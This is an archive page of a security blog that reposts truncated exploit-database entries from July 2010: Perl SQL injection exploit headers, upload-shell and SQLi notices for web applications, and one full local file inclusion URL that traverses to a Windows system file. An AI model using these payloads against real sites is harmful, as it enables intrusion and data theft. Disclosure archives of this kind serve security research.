grab our rss feed

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Home

Entries for July 2nd, 2010

Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit
============================================================
#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (member.php) Remote SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use LWP::UserAgent;
use HTTP::Cookies;
use strict;
my $UserName = [...]

Leave a Comment

Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================================
Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit
==================================================================
#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (forumdisplay.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit
==============================================================
#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (products.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit
====================================================================
#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit
==========================================================
#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (post.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

ES Simple Uploader v 1.1 => upload shell Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ES Simple Uploader v 1.1 => upload shell Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
ES Simple Uploader v 1.1 => upload shell Vulnerability
======================================================
##########################################
#[+] Date: 30/06/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] Email: M3GO@live.com
#[+] CategorY : Webapps/0day [...]

Leave a Comment

iScripts ReserveLogic 1.0 SQL Injection Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>iScripts ReserveLogic 1.0 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
iScripts ReserveLogic 1.0 SQL Injection Vulnerability
=====================================================
iScripts ReserveLogic 1.0 SQL Injection Vulnerability
Name iScripts ReserveLogic
Vendor [...]

Leave a Comment

MusicBox <= v3.3 (install.php) Change Password Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MusicBox <= v3.3 (install.php) Change Password Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
MusicBox <= v3.3 (install.php) Change Password Vulnerability
============================================================
[~] Author : Mr.ThieF
[~] Software Link : www.musicboxv2.com
[~] Version : v3.3
[~] Contact : Sj-@hotmail.com <~
[~] DorK : genre_artists.php?id=13
[~] CVE :
[~] Code :
[~] How To Exploit [...]

Leave a Comment

iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities
=============================================================
iScripts EasySnaps Multiple SQL Injection Vulnerabilities
Name iScripts EasySnaps
Vendor [...]

Leave a Comment

iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability
=========================================================
iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability
Name iScripts CyberMatch
Vendor [...]

Leave a Comment

Bit Weaver v2.7 Local File Inclusion Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bit Weaver v2.7 Local File Inclusion Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================
Bit Weaver v2.7 Local File Inclusion Vulnerability
==================================================
————————————————————————
Software…………….Bit Weaver 2.7
Vulnerability………..Local File Inclusion
Download…………….http://www.bitweaver.org/
Release Date…………7/1/2010
Tested On……………Windows Vista + XAMPP
————————————————————————
Author………………John Leitch
Site………………..http://cross-site-scripting.blogspot.com/
Email……………….john.leitch5@gmail.com
————————————————————————
–Description–
A local file inclusion vulnerability in Bit Weaver 2.7 can be
exploited to include arbitrary files.
–PoC–
http://server/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00
# [...]

Leave a Comment

Iphone Pointter Social Network LFI Vulnerablility

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Iphone Pointter Social Network LFI Vulnerablility</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Iphone Pointter Social Network LFI Vulnerablility
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Pointter Social Network LFI Vulnerablility

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Pointter Social Network LFI Vulnerablility</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================
Pointter Social Network LFI Vulnerablility
==========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Infotel (pagina.php) SQL Injection Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Infotel (pagina.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Infotel (pagina.php) SQL Injection Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability
===============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_seyret Blind SQL Injection Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_seyret Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
Joomla Component com_seyret Blind SQL Injection Vulnerability
=============================================================
[+]Title :Joomla Component (com_seyret) Blind SQL Injection Exploit
[+]Author [...]

Leave a Comment

MooreAdvice (productlist.asp) SQL injection Vulnerable

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MooreAdvice (productlist.asp) SQL injection Vulnerable</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
MooreAdvice (productlist.asp) SQL Injection Vulnerability
=========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Consulweb (index.php) Blind SQL Injection Vulnerability

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Consulweb (index.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Consulweb (index.php) Blind SQL Injection Vulnerability
=======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

MyImages Image file manager => upload shell

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MyImages Image file manager => upload shell</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
MyImages Image file manager => upload shell
===========================================
##########################################
#[+] Date: 02/07/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] CategorY : Webapps/0day TYPE: PHP
#[+] Email: M3GO@live.com
##########################################
[ [...]

Leave a Comment

DXL dev Image Hosting => upload shell

Jul.02, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>DXL dev Image Hosting => upload shell</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================
DXL dev Image Hosting => upload shell
=====================================
##########################################
#[+] Date: 02/07/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] CategorY : Webapps/0day TYPE: PHP
#[+] Email: M3GO@live.com
##########################################
[+] [...]

Leave a Comment

« previous entries

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News